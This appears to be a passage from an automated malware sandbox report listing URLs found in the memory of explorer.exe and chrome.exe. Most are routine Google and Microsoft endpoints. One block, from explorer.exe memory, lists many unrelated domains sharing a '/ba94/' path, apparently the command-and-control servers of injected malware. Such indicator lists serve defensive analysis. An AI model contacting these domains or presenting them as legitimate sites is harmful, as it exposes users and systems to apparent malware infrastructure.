          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.posteo.lol/ba94/www.naservus.com
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.posteo.lolReferer:
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.prismotrov.com
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.prismotrov.com/ba94/
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.prismotrov.com/ba94/www.reddragondao.com
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.prismotrov.comReferer:
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.reddragondao.com
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.reddragondao.com/ba94/
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.reddragondao.com/ba94/www.yourreicapital.com
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.reddragondao.comReferer:
          Source: explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sol-casino-2023.club
          Source: explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sol-casino-2023.club/ba94/
          Source: explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sol-casino-2023.club/ba94/www.gspotshop.com
          Source: explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sol-casino-2023.clubReferer:
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.spesandosupermercato.com
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.spesandosupermercato.com/ba94/
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.spesandosupermercato.com/ba94/www.prismotrov.com
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.spesandosupermercato.comReferer:
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.steam.help
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.steam.help/ba94/
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.steam.help/ba94/www.galaxyprofituk.com
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.steam.helpReferer:
          Source: explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thesiamesebetta.biz
          Source: explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thesiamesebetta.biz/ba94/
          Source: explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thesiamesebetta.biz/ba94/www.sol-casino-2023.club
          Source: explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thesiamesebetta.bizReferer:
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whatpixels.com
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whatpixels.com/ba94/
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whatpixels.com/ba94/www.jacobmcfarland.dev
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whatpixels.comReferer:
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yourreicapital.com
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yourreicapital.com/ba94/
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yourreicapital.com/ba94/www.fijula.com
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yourreicapital.comReferer:
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yqwija.info
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yqwija.info/ba94/
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yqwija.info/ba94/www.posteo.lol
          Source: explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yqwija.infoReferer:
          Source: chrome.exe, 0000000E.00000000.2166689905.0000282400964000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229196995.00005B800097C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
          Source: chrome.exe, 0000000E.00000000.2166582826.0000282400953000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229105493.00005B800092C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
          Source: chrome.exe, 0000000E.00000000.2166556085.0000282400928000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229105493.00005B800092C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
          Source: chrome.exe, 0000000E.00000000.2166582826.000028240093C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229105493.00005B800092C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
          Source: chrome.exe, 0000000E.00000000.2166582826.000028240093C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229105493.00005B800092C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSessionhttps://accounts.google.com/OAuthLoginhttps://accounts.google.
          Source: chrome.exe, 0000000E.00000000.2166689905.0000282400964000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229196995.00005B800097C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
          Source: chrome.exe, 0000000E.00000000.2166689905.0000282400964000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229196995.00005B800097C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
          Source: chrome.exe, 0000000E.00000000.2166582826.000028240093C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229105493.00005B800092C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
          Source: chrome.exe, 0000000E.00000000.2166582826.000028240093C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229105493.00005B800092C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/MergeSession
          Source: chrome.exe, 0000000E.00000000.2166582826.000028240093C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229105493.00005B800092C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/OAuthLogin
          Source: chrome.exe, 0000000F.00000000.2229105493.00005B800092C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/OTJgUOQcT7lO7GsGZq2G4IlTharP
          Source: chrome.exe, 0000000E.00000000.2166689905.0000282400964000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229196995.00005B800097C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
          Source: chrome.exe, 0000000E.00000000.2166689905.0000282400964000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229196995.00005B800097C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
          Source: chrome.exe, 0000000E.00000000.2166689905.0000282400964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.htmlBhttps://accounts.google.com/encryption/unlock/desktoph
          Source: chrome.exe, 0000000E.00000000.2166689905.0000282400964000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229196995.00005B800097C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
          Source: chrome.exe, 0000000E.00000000.2164699163.0000282400244000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2227120296.00005B8000236000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
          Source: chrome.exe, 0000000F.00000000.2227120296.00005B8000236000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenuhttps://accounts.google.com/embedded/setup
          Source: chrome.exe, 0000000E.00000000.2164699163.0000282400244000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenup
          Source: chrome.exe, 0000000E.00000000.2164699163.0000282400244000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2227120296.00005B8000236000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
          Source: chrome.exe, 0000000E.00000000.2164699163.0000282400244000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeostform.https://accounts.google.com/embed
          Source: chrome.exe, 0000000E.00000000.2164699163.0000282400244000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2227120296.00005B8000236000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
          Source: chrome.exe, 0000000E.00000000.2166689905.0000282400964000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229196995.00005B800097C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
          Source: chrome.exe, 0000000E.00000000.2166689905.0000282400964000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229196995.00005B800097C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/windows
          Source: chrome.exe, 0000000E.00000000.2166689905.0000282400964000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229196995.00005B800097C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
          Source: chrome.exe, 0000000E.00000000.2166689905.0000282400964000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229196995.00005B800097C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
          Source: chrome.exe, 0000000E.00000000.2166582826.0000282400953000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229105493.00005B800092C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
          Source: chrome.exe, 0000000E.00000000.2166582826.0000282400953000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxABdtedhttps://accoun
          Source: chrome.exe, 0000000F.00000000.2229105493.00005B800092C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxABebuihttps://accoun
          Source: chrome.exe, 0000000E.00000000.2166689905.0000282400964000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229196995.00005B800097C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
          Source: chrome.exe, 0000000E.00000000.2166689905.0000282400964000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229196995.00005B800097C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
          Source: chrome.exe, 0000000E.00000000.2166689905.0000282400964000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2229196995.00005B800097C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
          Source: explorer.exe, 00000002.00000000.1821307110.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000002.00000003.3111309486.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1812586501.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 00000002.00000003.3111309486.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1812586501.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
          Source: chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308r2
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319isIntel
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
          Source: chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369rcent
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
          Source: chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
          Source: explorer.exe, 00000002.00000000.1818187033.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6282433377.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3112104349.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000002.00000000.1818187033.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6282433377.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3112104349.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 00000002.00000003.3109169607.000000000370D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1783542988.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3113978053.000000000371C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1810569552.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6284916086.000000000371D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
